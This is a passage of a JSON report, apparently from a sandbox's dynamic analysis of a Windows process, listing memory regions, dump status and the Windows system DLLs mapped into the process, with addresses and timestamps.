"end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_920", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 
8791728652288, "timestamp": "00:01:03.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 44761087, "entry_point": 0, "filename": null, "id": "region_934", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:01:03.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000935-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_935", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:03.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_936", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:03.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_937", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:03.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_938", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:03.791", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000939-addr_0x0000000000610000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_939", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:03.795", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", 
"permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_940", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:01:03.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_941", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:03.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_942", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:03.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000943-addr_0x0000000002000000-size_0x0000000000030000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 196608, "start_va": 33554432, "type": 
"region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_943", "name": "private_0x0000000002000000", "norm_filename": null, "region_type": "private_memory", "start_va": 33554432, "timestamp": "00:01:03.805", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000944-addr_0x0000000002ab0000-size_0x00000000001b0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1769472, "start_va": 44761088, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x0000000002ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44761088, "timestamp": "00:01:03.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000945-addr_0x00000000026e0000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41222143, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.808", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000946-addr_0x00000000027f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": 
"summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41877504, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_946", "name": "private_0x00000000027f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41877504, "timestamp": "00:01:03.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42663936, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x00000000028b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42663936, "timestamp": "00:01:03.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 46530560, "type": "region", "version": 1 }, "end_va": 47579135, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x0000000002c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 46530560, "timestamp": "00:01:03.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000949-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, 
"filename": null, "id": "region_949", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:03.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000950-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:03.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_951", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:03.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45023232, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x0000000002af0000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 45023232, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000953-addr_0x0000000002c50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46465024, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_953", "name": "private_0x0000000002c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 46465024, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000954-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_954", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:03.824", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000955-addr_0x00000000026e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, 
"start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41025535, "entry_point": 0, "filename": null, "id": "region_955", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_961", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:03.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_962", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:03.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_963", "name": "mswsock.dll", "norm_filename": 
"c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:03.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_964", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:03.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_965", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:03.851", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_966", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:03.853", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 339968, "start_va": 8791727276032, "type": "region", "version": 1 }, "end_va": 8791727615999, "entry_point": 8791727287192, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_967", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 8791727276032, "timestamp": "00:01:03.866", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000968-addr_0x0000000002ee0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 49152000, "type": "region", "version": 1 }, "end_va": 49676287, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x0000000002ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49152000, "timestamp": "00:01:03.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_969", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:03.881", "type": "region", "version": 1 }, { "dump": { "filename": 
"", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_970", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:03.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_971", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:03.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_972", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:03.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", 
"writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50659328, "type": "region", "version": 1 }, "end_va": 51707903, "entry_point": 0, "filename": null, "id": "region_1120", "name": "private_0x0000000003050000", "norm_filename": null, "region_type": "private_memory", "start_va": 50659328, "timestamp": "00:01:04.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1121", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:04.084", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001122-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1122", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:04.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52035584, "type": "region", "version": 1 }, "end_va": 53084159, 
"entry_point": 0, "filename": null, "id": "region_1123", "name": "private_0x00000000031a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52035584, "timestamp": "00:01:04.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1124", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:04.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001125-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1125", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:04.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791726948352, "type": "region", "version": 1 }, "end_va": 8791727046655, "entry_point": 8791726955512, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1126", "name": "dhcpcsvc.dll", "norm_filename": 
"c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791726948352, "timestamp": "00:01:04.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791727079424, "type": "region", "version": 1 }, "end_va": 8791727149055, "entry_point": 8791727085228, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1127", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 8791727079424, "timestamp": "00:01:04.137", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001131-addr_0x00000000032d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 53280768, "type": "region", "version": 1 }, "end_va": 54329343, "entry_point": 0, "filename": null, "id": "region_1131", "name": "private_0x00000000032d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53280768, "timestamp": "00:01:04.178", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001132-addr_0x000007fffffaa000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1132", "name": 
"private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:01:04.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47710208, "type": "region", "version": 1 }, "end_va": 48758783, "entry_point": 0, "filename": null, "id": "region_1140", "name": "private_0x0000000002d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 47710208, "timestamp": "00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581266032, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1141", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001142-addr_0x000007fffffa8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": 
"00:01:04.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001143-addr_0x00000000033d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 54329344, "type": "region", "version": 1 }, "end_va": 55377919, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x00000000033d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 54329344, "timestamp": "00:01:04.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1144", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:04.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6426623, "entry_point": 6422528, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1145", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 6422528, "timestamp": "00:01:04.304", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1149", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:04.333", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31723519, "entry_point": 0, "filename": null, "id": "region_1150", "name": "pagefile_0x0000000001e40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31719424, "timestamp": "00:01:04.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566647296, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1157", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:04.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 
